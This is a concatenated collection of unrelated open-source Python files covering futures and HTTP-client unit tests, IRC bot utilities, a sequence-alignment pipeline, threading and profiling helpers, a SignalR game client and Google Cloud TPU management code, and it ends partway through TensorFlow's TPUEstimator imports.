self.assertEqual(f2._state, RUNNING) self.assertTrue(f3.cancel()) self.assertEqual(f3._state, CANCELLED) self.assertTrue(f4.cancel()) self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED) self.assertFalse(f5.cancel()) self.assertEqual(f5._state, FINISHED) self.assertFalse(f6.cancel()) self.assertEqual(f6._state, FINISHED) def test_cancelled(self): self.assertFalse(PENDING_FUTURE.cancelled()) self.assertFalse(RUNNING_FUTURE.cancelled()) self.assertTrue(CANCELLED_FUTURE.cancelled()) self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled()) self.assertFalse(EXCEPTION_FUTURE.cancelled()) self.assertFalse(SUCCESSFUL_FUTURE.cancelled()) def test_done(self): self.assertFalse(PENDING_FUTURE.done()) self.assertFalse(RUNNING_FUTURE.done()) self.assertTrue(CANCELLED_FUTURE.done()) self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done()) self.assertTrue(EXCEPTION_FUTURE.done()) self.assertTrue(SUCCESSFUL_FUTURE.done()) def test_running(self): self.assertFalse(PENDING_FUTURE.running()) self.assertTrue(RUNNING_FUTURE.running()) self.assertFalse(CANCELLED_FUTURE.running()) self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running()) self.assertFalse(EXCEPTION_FUTURE.running()) self.assertFalse(SUCCESSFUL_FUTURE.running()) def test_result_with_timeout(self): self.assertRaises(futures.TimeoutError, PENDING_FUTURE.result, timeout=0) self.assertRaises(futures.TimeoutError, RUNNING_FUTURE.result, timeout=0) self.assertRaises(futures.CancelledError, CANCELLED_FUTURE.result, timeout=0) self.assertRaises(futures.CancelledError, CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0) self.assertRaises(IOError, EXCEPTION_FUTURE.result, timeout=0) self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42) def test_result_with_success(self): # TODO(brian@sweetapp.com): This test is timing dependant. def notification(): # Wait until the main thread is waiting for the result. time.sleep(1) f1.set_result(42) f1 = create_future(state=PENDING) t = threading.Thread(target=notification) t.start() self.assertEqual(f1.result(timeout=5), 42) def test_result_with_cancel(self): # TODO(brian@sweetapp.com): This test is timing dependant. def notification(): # Wait until the main thread is waiting for the result. time.sleep(1) f1.cancel() f1 = create_future(state=PENDING) t = threading.Thread(target=notification) t.start() self.assertRaises(futures.CancelledError, f1.result, timeout=5) def test_exception_with_timeout(self): self.assertRaises(futures.TimeoutError, PENDING_FUTURE.exception, timeout=0) self.assertRaises(futures.TimeoutError, RUNNING_FUTURE.exception, timeout=0) self.assertRaises(futures.CancelledError, CANCELLED_FUTURE.exception, timeout=0) self.assertRaises(futures.CancelledError, CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0) self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0), IOError)) self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None) def test_exception_with_success(self): def notification(): # Wait until the main thread is waiting for the exception. time.sleep(1) with f1._condition: f1._state = FINISHED f1._exception = IOError() f1._condition.notify_all() f1 = create_future(state=PENDING) t = threading.Thread(target=notification) t.start() self.assertTrue(isinstance(f1.exception(timeout=5), IOError)) @test.support.reap_threads def test_main(): try: test.support.run_unittest(ProcessPoolExecutorTest, ThreadPoolExecutorTest, ProcessPoolWaitTests, ThreadPoolWaitTests, ProcessPoolAsCompletedTests, ThreadPoolAsCompletedTests, FutureTests, ProcessPoolShutdownTest, ThreadPoolShutdownTest) finally: test.support.reap_children() if __name__ == "__main__": test_main()
freetests.py
#!/usr/bin/env python3 # coding: utf-8 # Copyright 2013 Abram Hindle # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # run python freetests.py import unittest import httpclient import http.server import threading import socketserver import random import time import urllib.parse import json BASEHOST = '127.0.0.1' BASEPORT = 27600 + random.randint(1,100) httpclass = httpclient #import mysolution #httpclass = mysolution # Sorry but in Python this comes out of the box! class MyHTTPHandler(http.server.BaseHTTPRequestHandler): post = None get = None def do_POST(self): try: if (self.post == None): return None else: return self.post() except Exception as e: print("Exception %s\n" % e) raise e def do_GET(self): try: print("GET %s\n" % self.path) if (self.get == None): return None else: return self.get() except Exception as e: print("Exception %s\n" % e) raise e def make_http_server(host = BASEHOST, port = BASEPORT): return http.server.HTTPServer( (host, port) , MyHTTPHandler) # always returns 404 def nothing_available(self): self.send_error(404, "File not found") self.end_headers() self.wfile.write(bytes("","utf-8")) # repeats your path back def echo_path_get(self): self.send_response(200) self.send_header("Content-type", "text/plain") self.end_headers() self.wfile.write(bytes("%s\n" % self.path,"utf-8")) # repeats your post back as json def echo_post(self): length = int(self.headers['Content-Length']) post_data = urllib.parse.parse_qs(self.rfile.read(length).decode('utf-8')) self.send_response(200) self.send_header("Content-type", "application/json") self.end_headers() self.wfile.write(bytes(json.dumps(post_data),"utf-8")) def header_check(self): response = 200 errors = [] if 'Host' not in self.headers: response = 400 errors.append("No Host header found") self.send_response(response) self.send_header("Content-type", "application/json") self.end_headers() self.wfile.write(bytes(json.dumps(errors),"utf-8")) def die_on_method(self): response = 405 errors = [] errors.append("Method Not Allowed") if 'Host' not in self.headers: errors.append("No Host header found") self.send_response(response) self.send_header("Content-type", "application/json") self.end_headers() self.wfile.write(bytes(json.dumps(errors),"utf-8")) def post_header_check(self): response = 200 errors = [] if 'Host' not in self.headers: response = 400 errors.append("No Host header found") if 'Content-length' not in self.headers: response = 400 errors.append("No Content-Length header found") self.send_response(response) self.send_header("Content-type", "application/json") self.end_headers() self.wfile.write(bytes(json.dumps(errors),"utf-8")) class TestHTTPClient(unittest.TestCase): httpd = None running = False @classmethod def setUpClass(self): '''Cache the httpd server and run it as a thread''' if (TestHTTPClient.httpd == None): try: self.thread = threading.Thread(target=self.run_server).start() time.sleep(1) except Exception as e: print(e) print("setUP: Thread died") raise(e) @classmethod def run_server(self): '''run the httpd server in a thread''' try: socketserver.TCPServer.allow_reuse_address = True http.server.HTTPServer.allow_reuse_address = True TestHTTPClient.httpd = make_http_server() print("HTTP UP!\n") TestHTTPClient.httpd.serve_forever() print("HTTP has been shutdown!\n") except Exception as e: print(e) print("run_server: Thread died") def test404GET(self): '''Test against 404 errors''' MyHTTPHandler.get = nothing_available http = httpclass.HTTPClient() req = http.GET("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) ) self.assertTrue(req != None, "None Returned!") self.assertTrue(req.code == 404) def test404POST(self): '''Test against 404 errors''' MyHTTPHandler.post = nothing_available http = httpclass.HTTPClient() req = http.POST("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) ) self.assertTrue(req != None, "None Returned!") self.assertTrue(req.code == 404) def testGET(self): '''Test HTTP GET''' MyHTTPHandler.get = echo_path_get http = httpclass.HTTPClient() path = "abcdef/gjkd/dsadas" url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path) req = http.GET( url ) self.assertTrue(req != None, "None Returned!") self.assertTrue(req.code == 200) self.assertTrue(req.body.find(path)>=0, "Data: [%s] " % req.body) def testGETHeaders(self): '''Test HTTP GET Headers''' MyHTTPHandler.get = header_check MyHTTPHandler.post = die_on_method http = httpclass.HTTPClient() path = "abcdef/gjkd/dsadas" url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path) req = http.GET( url ) self.assertTrue(req != None, "None Returned!") self.assertTrue(req.code == 200) def testPOSTHeaders(self): '''Test HTTP POST Headers''' MyHTTPHandler.post = post_header_check MyHTTPHandler.get = die_on_method http = httpclass.HTTPClient() path = "abcdef/gjkd/dsadas" url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path) req = http.POST( url ) self.assertTrue(req != None, "None Returned!") self.assertTrue(req.code == 200,"Code is %s but I wanted a 200 OK" % req.code) # consider disabling this test until everything else works def testInternetGets(self): '''Test HTTP Get in the wild, these webservers are far less forgiving''' MyHTTPHandler.get = echo_path_get http = httpclass.HTTPClient() urls = [ "http://www.cs.ualberta.ca/", "http://softwareprocess.es/static/SoftwareProcess.es.html", "http://c2.com/cgi/wiki?CommonLispHyperSpec", "http://slashdot.org" ] for url in urls: try: req = http.GET( url ) except Exception as e: print("An Exception was thrown for %s" % url) self.assertTrue( False, "An Exception was thrown for %s %s" % (url,e)) self.assertTrue(req != None, "None Returned! %s" % url) self.assertTrue(req.code == 200 or req.code == 301 or req.code == 302, "Code: %s for %s" % (req.code, url)) if (req.code == 200): self.assertTrue(req.body.find("DOCTYPE")>=0 or req.body.find("<body")>=0 , "%s Data: [%s] " % (url,req.body)) def testPOST(self): '''Test HTTP POST with an echo server''' MyHTTPHandler.post = echo_post http = httpclass.HTTPClient() path = "post_echoer" url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path) args = {'a':'aaaaaaaaaaaaa', 'b':'bbbbbbbbbbbbbbbbbbbbbb', 'c':'c', 'd':'012345\r67890\n2321321\n\r'} print("Sending POST!") req = http.POST( url, args=args ) self.assertTrue(req != None, "None Returned!") self.assertTrue(req.code == 200) print("Test Post Body: [%s]" % req.body) outargs = json.loads(req.body) print(outargs.__class__) for key in args: self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key) for key in outargs: self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key) @classmethod def tearDownClass(self): if (TestHTTPClient.httpd!=None): print("HTTP Shutdown in tearDown\n") TestHTTPClient.httpd.shutdown() TestHTTPClient.httpd.server_close() time.sleep(1) def test_test_webserver(): print("http://%s:%d/dsadsadsadsa\n" % (BASEHOST,BASEPORT) ) MyHTTPHandler.get = echo_path_get MyHTTPHandler.post = echo_post httpd = make_http_server() try: httpd.serve_forever() finally: httpd.shutdown() if __name__ == '__main__': unittest.main()
common.py
# http://inamidst.com/saxo/ # Created by Sean B. Palmer # You know your code is good when you don't have a generic module import base64 import collections import os import pickle import signal import socket import sys import threading # Usage as of 534f8c68: # b64pickle: client # b64unpickle: client, scheduler # error: client, create, script # exit_cleanly: client, saxo # populate: client, create # thread: client, script def console(): # TODO: This can probably be removed client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) client_sock = os.path.expanduser("~/.saxo/client.sock") client.connect(client_sock) while True: try: text = input("$ ") except (EOFError, KeyboardInterrupt): print("") print("Quitting...") break if " " in text: instruction, args = text.split(" ", 1) if args: args = eval("(%s,)" % args) args = b64pickle(args) else: instruction, args = text, b"" octets = instruction.encode("ascii") + b" " + args client.send(octets + b"\n") def error(short, long=None, err=None, code=1): print("saxo: error: " + short, file=sys.stderr) if long is not None: print(long.rstrip(), file=sys.stderr) if err is not None: if long is not None: print("", file=sys.stderr) print("This is the error message that python gave:", file=sys.stderr) print("", file=sys.stderr) print(" %s" % err.__class__.__name__) print(" %s" % err) sys.exit(code) def exit_cleanly(): def quit(signum, frame): print("Exiting cleanly (SIG %s)" % signum) try: sys.exit() finally: os._exit(0) signal.signal(signal.SIGINT, quit) signal.signal(signal.SIGTERM, quit) def populate(saxo_path, base): # TODO: This is being called twice plugins = os.path.join(base, "plugins") saxo_plugins = os.path.join(saxo_path, "plugins") if not os.path.isdir(plugins): os.mkdir(plugins) commands = os.path.join(base, "commands") saxo_commands = os.path.join(saxo_path, "commands") if not os.path.isdir(commands): os.mkdir(commands) def symlink(source, dest): try: os.symlink(source, dest) except FileExistsError: ... for name in os.listdir(saxo_plugins): dest = os.path.join(plugins, name) if not (os.path.exists(dest) or os.path.islink(dest)): symlink(os.path.join(saxo_plugins, name), dest) with open(os.path.join(commands, "saxo.pth"), "w") as f: f.write(saxo_path + "\n") old_path_file = os.path.join(commands, ".saxo-path") if os.path.islink(old_path_file): os.remove(old_path_file) for name in os.listdir(saxo_commands): dest = os.path.join(commands, name) if not (os.path.exists(dest) or os.path.islink(dest)): symlink(os.path.join(saxo_commands, name), dest) # Clean up any broken symlinks for directory in (plugins, commands): for name in os.listdir(directory): link = os.path.join(directory, name) if not os.path.islink(link): continue target = os.readlink(link) target = os.path.join(directory, target) if not os.path.exists(target): os.remove(link) def b64pickle(obj): pickled = pickle.dumps(obj) return base64.b64encode(pickled) def b64unpickle(data): if data: pickled = base64.b64decode(data) return pickle.loads(pickled) return tuple() def thread(target, *args): t = threading.Thread(target=target, args=tuple(args), daemon=True) t.start() return t def tarjan(graph): # Robert E. Tarjan's 1975 strongly connected nodes algorithm # This is a kind of robust topological sort index = {} lowlinks = {} stack = collections.OrderedDict() result = [] def search(node): index[node] = len(index) lowlinks[node] = index[node] stack[node] = None for succ in graph.get(node, ()): if succ not in index: search(succ) lowlinks[node] = min(lowlinks[succ], lowlinks[node]) elif succ in stack: lowlinks[node] = min(lowlinks[node], index[succ]) if lowlinks[node] == index[node]: connected = [] succ = None while succ != node: succ = stack.popitem()[0] connected.append(succ) result.append(connected) for node in graph: if not node in index: search(node) return result def tsort(graph): for connected in tarjan(graph): for node in connected: yield node
external_tools.py
import logging import multiprocessing import os from subprocess import run from Bio import SeqIO, AlignIO from Bio.Seq import Seq from Bio.SeqRecord import SeqRecord from constants import CD_HIT_CLUSTER_REPS_OUTPUT_FILE, CLUSTERS_NT_SEQS_DIR, CLUSTERS_ALIGNMENTS_DIR, \ NUMBER_OF_PROCESSES, FASTA_FILE_TYPE, ALIGNMENTS_FOR_TREE_DIR, DATA_DIR, ALIGNMENT_STRAIN_PATTERN, STRAINS_COUNT from data_analysis import build_strain_names_map from logging_config import worker_configurer def perform_clustering_on_proteins(aggregated_proteins_file_path): """Run the CD-HIT program to perform clustering on the strains""" logger = logging.getLogger() logger.info("Running CD-HIT on combined proteins file to create clustering") cd_hit_args = " ".join(["cd-hit", "-i", aggregated_proteins_file_path, "-o", CD_HIT_CLUSTER_REPS_OUTPUT_FILE, "-c 0.70", "-n 5", "-M 16000", "-g 1", "-p 1"]) cd_hit_return_code = run(cd_hit_args, shell=True).returncode logger.info("Finished running CD-HIT with return code %d" % cd_hit_return_code) return cd_hit_return_code def perform_clustering_on_cds(input_file, output_file): """Run the CD-HIT-EST program to perform clustering on the strains representatives and pseudogenes""" logger = logging.getLogger() logger.info("Running CD-HIT-EST on combined representative and pseudogene cds file to create clustering") cd_hit_est_args = " ".join(["cd-hit-est", "-i", input_file, "-o", output_file, "-c 0.8", "-n 5", "-M 16000", "-g 1", "-p 1", "-d 30"]) cd_hit_est_return_code = run(cd_hit_est_args, shell=True).returncode logger.info("Finished running CD-HIT with return code %d" % cd_hit_est_return_code) return cd_hit_est_return_code def perform_alignment_on_core_clusters(log_queue): """Run MAFFT & Gblocks tools on fasta files of protein nucleotide seqs for each core cluster""" logger = logging.getLogger(__name__) logger.info("Running MAFFT & Gblocks on core clusters for alignment") if not os.path.exists(CLUSTERS_NT_SEQS_DIR): logger.error("No clusters dir found, exiting") exit(1) if not os.path.exists(CLUSTERS_ALIGNMENTS_DIR): os.makedirs(CLUSTERS_ALIGNMENTS_DIR) job_queue = multiprocessing.Queue() prepare_alignment_jobs(job_queue) workers = [ multiprocessing.Process(target=perform_alignment_and_pruning, args=(i, job_queue, worker_configurer, log_queue)) for i in range(NUMBER_OF_PROCESSES)] for w in workers: w.start() job_queue.put(None) for w in workers: w.join() logger.info("Finished running MAFFT for all clusters") def prepare_alignment_jobs(job_queue): """Put all downloaded strain dirs in job queue for workers""" core_clusters = os.listdir(CLUSTERS_NT_SEQS_DIR) for cluster_file in core_clusters: job_queue.put(cluster_file) def perform_alignment_and_pruning(worker_id, job_queue, configurer, log_queue): """ Perform MAFFT alignment and Gblocks pruning for a core cluster fasta file """ configurer(log_queue) logger = logging.getLogger(__name__ + "_worker_" + str(worker_id)) while True: cluster_file = job_queue.get() if cluster_file is None: job_queue.put(None) break logger.info("Running MAFFT for %s" % cluster_file) alignment_stdout = open("alignment_stdout.log", "w") alignment_stderr = open("alignment_stderr.log", "w") cluster_alignment_filename = cluster_file + "_alignment" if not os.path.exists(os.path.join(CLUSTERS_ALIGNMENTS_DIR, cluster_alignment_filename)): cluster_alignment_file = open(os.path.join(CLUSTERS_ALIGNMENTS_DIR, cluster_alignment_filename), 'w') mafft_args = " ".join(["mafft", "--auto", os.path.join(CLUSTERS_NT_SEQS_DIR, cluster_file)]) mafft_return_code = run(mafft_args, shell=True, stdout=cluster_alignment_file, stderr=alignment_stderr).returncode logger.info("Finished running MAFFT for %s with return code %d" % (cluster_file, mafft_return_code)) cluster_alignment_file.close() logger.info("Running GBlocks for %s" % cluster_file) gblocks_args = " ".join(["Gblocks", os.path.join(CLUSTERS_ALIGNMENTS_DIR, cluster_alignment_filename), "-t=d", "-b5=a", "-p=n"]) gblocks_return_code = run(gblocks_args, shell=True, stdout=alignment_stdout, stderr=alignment_stderr).returncode logger.info( "Finished running Gblocks for alignment %s with return code %d" % (cluster_alignment_filename, gblocks_return_code)) def prepare_alignments_for_tree(log_queue): """Edit each alignment to remove invariant positions, pad missing strain seqs & concatenate all alignments""" logger = logging.getLogger(__name__) logger.info("Preparing core clusters alignments for tree") if not os.path.exists(CLUSTERS_ALIGNMENTS_DIR): logger.error("No alignments dir found, exiting") exit(1) if not os.path.exists(ALIGNMENTS_FOR_TREE_DIR): os.makedirs(ALIGNMENTS_FOR_TREE_DIR) job_queue = multiprocessing.Queue() prepare_alignment_editing_jobs(job_queue) workers = [ multiprocessing.Process(target=perform_alignment_editing, args=(i, job_queue, worker_configurer, log_queue)) for i in range(NUMBER_OF_PROCESSES)] for w in workers: w.start() job_queue.put(None) for w in workers: w.join() logger.info("Finished editing all alignments, concatenating") edited_alignment_files = os.listdir(ALIGNMENTS_FOR_TREE_DIR) concatenated_alignment = None concatenated_alignment_file = os.path.join(DATA_DIR, "all_alignments") for edited_alignment_file in edited_alignment_files: logger.info("Concatenating alignment %s" % edited_alignment_file) with open(os.path.join(ALIGNMENTS_FOR_TREE_DIR, edited_alignment_file), "r") as f: edited_alignment = AlignIO.read(f, FASTA_FILE_TYPE) if not concatenated_alignment: concatenated_alignment = edited_alignment[:, :] else: concatenated_alignment += edited_alignment[:, :] AlignIO.write(concatenated_alignment, open(concatenated_alignment_file, "w"), FASTA_FILE_TYPE) logger.info("Finished concatenating all alignments, written to %s" % concatenated_alignment_file) def prepare_alignment_editing_jobs(job_queue): """Put all downloaded strain dirs in job queue for workers""" alignments = os.listdir(CLUSTERS_ALIGNMENTS_DIR) for alignment_file in alignments: if alignment_file.endswith("-gb"): job_queue.put(alignment_file) def perform_alignment_editing(worker_id, job_queue, configurer, log_queue): """ Perform alignment editing """ configurer(log_queue) logger = logging.getLogger(__name__ + "_worker_" + str(worker_id)) while True: alignment_file = job_queue.get() if alignment_file is None: job_queue.put(None) break logger.info("Editing alignment %s" % alignment_file) alignment = AlignIO.read(open(os.path.join(CLUSTERS_ALIGNMENTS_DIR, alignment_file), "r"), FASTA_FILE_TYPE) edited_alignment = None for col_idx in range(alignment.get_alignment_length()): col = alignment[:, col_idx:col_idx + 1] col_str = alignment[:, col_idx] if not all(c == col_str[0] for c in col_str): if not edited_alignment: edited_alignment = col else: edited_alignment += col alignment_seq_len = edited_alignment.get_alignment_length() logger.info("alignment_seq_len = %d" % alignment_seq_len) strain_idx = 0 while strain_idx < STRAINS_COUNT: logger.info("in while - strain_idx = %d" % strain_idx) if len(edited_alignment) > strain_idx: seq = edited_alignment[strain_idx] seq_strain_idx = int(ALIGNMENT_STRAIN_PATTERN.match(seq.id).group(1)) logger.info("checking if strain idx %d < seq_strain_idx %d" % (strain_idx, seq_strain_idx)) if strain_idx < seq_strain_idx: for i in range(seq_strain_idx - strain_idx): logger.info("adding padded seq at idx %d" % (strain_idx + i)) edited_alignment._records.insert(strain_idx + i, SeqRecord(Seq(alignment_seq_len * '-'), id="[%d] padding" % (strain_idx + i))) strain_idx += (seq_strain_idx - strain_idx + 1) continue strain_idx += 1 else: logger.info("adding padded seq at end of alignment list") edited_alignment.append(SeqRecord(Seq(alignment_seq_len * '-'), id="[%d] padding" % strain_idx)) strain_idx += 1 alignment_file_edited = os.path.join(ALIGNMENTS_FOR_TREE_DIR, alignment_file) logger.info("Finished padding alignment - writing to file %s" % alignment_file_edited) AlignIO.write(edited_alignment, open(alignment_file_edited, "w"), FASTA_FILE_TYPE) def format_concatenated_alignment(): logger = logging.getLogger(__name__) strain_names_map = build_strain_names_map() tree_alignment = AlignIO.read(open(os.path.join(DATA_DIR, "all_alignments"), "r"), FASTA_FILE_TYPE) tree_alignment_filtered = AlignIO.MultipleSeqAlignment([]) for id, strain in zip(range(STRAINS_COUNT), tree_alignment): if all(c == '-' for c in strain.seq): logger.info("skipping filtered strain %d" % id) else: logger.info("adding id to strain %d" % id) strain.id = "[" + str(id) + "]" + strain_names_map[id] strain.description = '' tree_alignment_filtered.append(strain) AlignIO.write(tree_alignment_filtered, open(os.path.join(DATA_DIR, "filtered_tree_alignment"), "w"), FASTA_FILE_TYPE)
testThread.py
import threading import time def threadf(name): print("Thread %s: starting thread",name) x = 0 while(1): time.sleep(1) s = "Thread " + str(x) print(s) x = x + 1 if __name__ == "__main__": print("Starting Program") x = threading.Thread(target=threadf, args=(1,)) x.start() y = 0 while(1): time.sleep(2) s = "Main: " + str(y) print(s) y = y + 1
psutil_monitor.py
# licensed under the apache license: http://www.apache.org/licenses/license-2.0 # for details: https://github.com/gaogaotiantian/vizplugins/blob/master/notice.txt import multiprocessing as mp import os from viztracer.vizplugin import VizPluginBase from .monitor_process import MonitorProcess class PsutilMonitor(VizPluginBase): def __init__(self, options, interval): super().__init__() self.action_queue = mp.Queue() self.data_queue = mp.Queue() self.options = options self.interval = interval def support_version(self): return "0.11.0" def message(self, m_type, payload): if m_type == "event": if payload["when"] == "initialize": return self.generate_process() elif payload["when"] == "post-stop": return self.stop_recording() elif payload["when"] == "pre-save": return self.save_data() elif payload["when"] == "pre-start": return self.start_recording() elif m_type == "command": if payload["cmd_type"] == "terminate": return self.terminate() return {} def generate_process(self): self.cpu_process = mp.Process(target=MonitorProcess(self.action_queue, self.data_queue, self.options, self.interval), daemon=True) self.cpu_process.start() return {} def start_recording(self): return self.send_action("start") def stop_recording(self): return self.send_action("stop") def save_data(self): self.recording = self.send_action("get-data") return {"action": "handle_data", "handler": self.append_data} def append_data(self, data): pid = os.getpid() for k in self.recording.keys(): for data_point in self.recording[k]: d = {"name": k, "ph": "C", "ts": data_point["ts"] * (1e6), "args": data_point["arg"], "pid": pid, "tid": pid} data["traceEvents"].append(d) def terminate(self): self.send_action("terminate") self.cpu_process.join() return {"success": True} def send_action(self, message): self.action_queue.put(message) return self.data_queue.get()
main.py
from game import Game import sys import threading from signalrcore.hub_connection_builder import HubConnectionBuilder def main(game_token=''): game = None user_token = None if game_token == '': game = Game('user1', game_token) user_token, game_token = game.start() game.game_token = game_token print(game_token) else: game = Game('user2', game_token) user_token = game.accept() hub_connection = HubConnectionBuilder().with_url( "ws://localhost:5000/engine", options={ "access_token_factory": lambda: user_token }).with_automatic_reconnect({ "type": "raw", "keep_alive_interval": 10, "reconnect_interval": 5, "max_attempts": 5 }).build().build() hub_connection.start() hub_connection.on("Shot", lambda _: game.shot()) hub_connection.on("Accepted", lambda _: game.accepted()) while True: command = input() if command.lower() == 'quit': print("Goodbye!") return if command.lower().startswith('shoot'): command = command.replace('shoot', '') (x, y) = list(map(int, command.split())) game.shoot(x, y) if __name__ == '__main__': thread = None if len(sys.argv) > 1: thread = threading.Thread(target=main, args=(sys.argv[1], )) else: thread = threading.Thread(target=main) thread.start()
tpu_survival.py
# Adapted from https://github.com/GoogleCloudPlatform/cloudml-samples/tree/master/tpu/utils/survival import json import logging from multiprocessing import Process import os import shlex import signal from subprocess import PIPE from subprocess import Popen import time from googleapiclient import discovery from oauth2client.client import GoogleCredentials RUN_TASK_COMMAND = 'bash run.sh {tpu_name} {model}' TENSORFLOW_VERSION = '1.13' credentials = GoogleCredentials.get_application_default() class TPUSurvival(object): def __init__(self, project=None, location=None, id=None, params=None, d=None): if d is None: self.project = project self.location = location self.prefix = params["name"] self.id = id self.params = params self.running_time = 0. self.current_save = 0 self.done = False else: self.project = d["project"] self.location = d["location"] self.params = d["params"] self.prefix = self.params["name"] self.id = d["id"] self.running_time = d["running_time"] self.current_save = d["current_save"] self.done = d["done"] # current running job self.current_process = None self.state = None self.created = False self.task_running = False def tpu_name(self): """Format tpu_name to be used in creation and deletion calls.""" return '{}'.format(self.prefix) def tpu_cidr_block(self): """Format CIDR block to be used in creation calls.""" cidr = '10.0.{}.0/29'.format(self.id) return cidr def update_state(self): """Poll the TPU nodes and update self.state.""" nodes = list_tpus(self.project, self.location).get('nodes', []) self.state = None for node in nodes: name = node['name'] tpu_name = name.split('/')[-1] health = node.get('health', None) state = node['state'] # The node that is running the current task. if tpu_name == self.tpu_name(): # logging.info('{} - TPU health/state: {}: {}/{}'.format(self.prefix, tpu_name, health, state)) self.state = state if self.state is None: self.created = False def kill_current_task(self): """Kill the current running task.""" logging.info('{} - killing current process: {}'.format(self.prefix, self.current_process.pid)) # The subprocess runs a shell command, which in turn calls python. # This kills the whole process group with the shell command as the # process group leader. os.killpg(os.getpgid(self.current_process.pid), signal.SIGTERM) self.task_running = False self.running_time += time.time() - self.started_time # run_task should be called at the beginning and # then only after the call to kill current_process def run_task(self): """Call a subprocess to run the training task on the current TPU node. """ tpu_name = self.tpu_name() logging.info('{} - running task: {}'.format(self.prefix, tpu_name)) with open(self.prefix + ".json", "w") as f: json.dump(self.params["model_params"], f) cmd = RUN_TASK_COMMAND.format(tpu_name=tpu_name, model=self.prefix + ".json") command = shlex.split(cmd) # use popen so we can kill it when needed p = Popen(command, stdout=PIPE, preexec_fn=os.setsid) self.task_running = True self.started_time = time.time() self.current_process = p def delete(self): """Delete the TPU node. """ tpu_name = self.tpu_name() logging.info('{} - deleting: {}'.format(self.prefix, tpu_name)) args = (self.project, self.location, tpu_name) p = Process(target=delete_tpu, args=args) p.start() return p def create(self): """Create a TPU node. """ tpu_name = self.tpu_name() tpu_cidr_block = self.tpu_cidr_block() logging.info('{} - creating: {}, {}'.format(self.prefix, tpu_name, tpu_cidr_block)) args = ( self.project, self.location, tpu_name, self.params["accelerator_type"], TENSORFLOW_VERSION, tpu_cidr_block, self.params["preemptible"] ) p = Process(target=create_tpu, args=args) p.start() self.created = True return p def dump_dict(self): d = { "project": self.project, "location": self.location, "id": self.id, "params": self.params, "running_time": self.running_time, "current_save": self.current_save, "done": self.done } return d # Util functions def list_tpus(project, location): """List existing TPU nodes in the project/location. Args: project: (str) GCP project id. location: (str) GCP compute location, such as "us-central1-b". Returns A Python dictionary with keys 'nodes' and 'nextPageToken'. """ logging.getLogger("googleapiclient.discovery").setLevel(logging.WARNING) # Silence URL spam service = discovery.build('tpu', 'v1', credentials=credentials, cache_discovery=False) parent = 'projects/{}/locations/{}'.format(project, location) request = service.projects().locations().nodes().list(parent=parent) return request.execute() def create_tpu(project, location, tpu_name, accelerator_type='v2-8', tensorflow_version='1.11', cidr_block='10.0.101.0', preemptible=False): """Create a TPU node. Args: project: (str) GCP project id. location: (str) GCP compute location, such as "us-central1-b". tpu_name: (str) The ID of the TPU node. accelerator_type: (str) The type of the TPU node, such as "v2-8". tensorflow_version: (str) The TensorFlow version, such as "1.11". cidr_block: (str) The CIDR block used by the TPU node, such as "10.0.101.0". preemptible: (bool) Whether the node should be created as preemptible. Returns A TPU node creation operation object. """ service = discovery.build('tpu', 'v1', credentials=credentials, cache_discovery=False) parent = 'projects/{}/locations/{}'.format(project, location) node = { 'acceleratorType': accelerator_type, 'tensorflowVersion': tensorflow_version, 'network': 'default', 'cidrBlock': cidr_block, 'schedulingConfig': { 'preemptible': preemptible } } # NOTE: in docs and samples nodeId is often referred to as tpu_name request = service.projects().locations().nodes().create( parent=parent, body=node, nodeId=tpu_name) return request.execute() def get_tpu(project, location, tpu_name): """List existing TPU nodes in the project/location. Args: project: (str) GCP project id. location: (str) GCP compute location, such as "us-central1-b". tpu_name: (str) The ID of the TPU node. Returns A TPU node object. """ service = discovery.build('tpu', 'v1', credentials=credentials, cache_discovery=False) name = 'projects/{}/locations/{}/nodes/{}'.format( project, location, tpu_name) request = service.projects().locations().nodes().get(name=name) return request.execute() def delete_tpu(project, location, tpu_name): """List existing TPU nodes in the project/location. Args: project: (str) GCP project id. location: (str) GCP compute location, such as "us-central1-b". tpu_name: (str) The ID of the TPU node. Returns A TPU node deletion operation object. """ service = discovery.build('tpu', 'v1', credentials=credentials, cache_discovery=False) name = 'projects/{}/locations/{}/nodes/{}'.format( project, location, tpu_name) request = service.projects().locations().nodes().delete( name=name) return request.execute()
tpu_estimator.py
# Copyright 2017 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # =================================================================== """TPUEstimator class.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import copy import os import signal import threading import time import traceback import numpy as np import six from six.moves import queue as Queue # pylint: disable=redefined-builtin from six.moves import xrange # pylint: disable=redefined-builtin from tensorflow.contrib.tpu.python.ops import tpu_ops from tensorflow.contrib.tpu.python.tpu import session_support from tensorflow.contrib.tpu.python.tpu import tpu from tensorflow.contrib.tpu.python.tpu import tpu_config from tensorflow.contrib.tpu.python.tpu import tpu_context from tensorflow.contrib.tpu.python.tpu import tpu_feed from tensorflow.contrib.tpu.python.tpu import training_loop from 